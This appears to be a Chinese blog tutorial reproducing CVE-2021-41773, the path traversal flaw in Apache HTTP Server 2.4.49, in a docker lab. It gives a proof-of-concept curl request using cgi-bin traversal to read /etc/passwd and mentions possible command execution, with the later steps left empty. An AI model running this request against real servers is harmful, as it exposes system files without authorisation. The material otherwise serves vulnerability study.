常见中间件漏洞之四:Apache

1. CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid

漏洞复现

http://8.138.19.182:8082/

1.使⽤poc

curl http://8.138.19.182:8082/cgi-bin/../../../../etc/passwd

2.⼯具验证

3.在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令

相关推荐
emma羊羊1 天前
【API安全】crapi靶场实战
apache·api·crapi靶场
SelectDB技术团队1 天前
Apache Doris 实时更新全解:从设计原理到最佳实践|Deep Dive
apache
stella·1 天前
RabbitMQ是什么?如何使用
java·分布式·中间件·消息队列·rabbitmq·削峰填谷
T.O.P_KING1 天前
Kafka如何实现高性能IO?
中间件·消息队列
天翼云开发者社区2 天前
nginx解决进程内存占用翻倍
中间件
SelectDB2 天前
Apache Doris 实时更新全解:从设计原理到最佳实践|Deep Dive
数据库·apache
路由侠内网穿透.2 天前
本地部署问答社区 Apache Anwser 并实现外部访问
服务器·windows·网络协议·apache·远程工作
o***59272 天前
国产化中间件东方通TongWeb环境安装部署(图文详解)
中间件
a***59262 天前
docker离线安装及部署各类中间件(x86系统架构)
docker·中间件·系统架构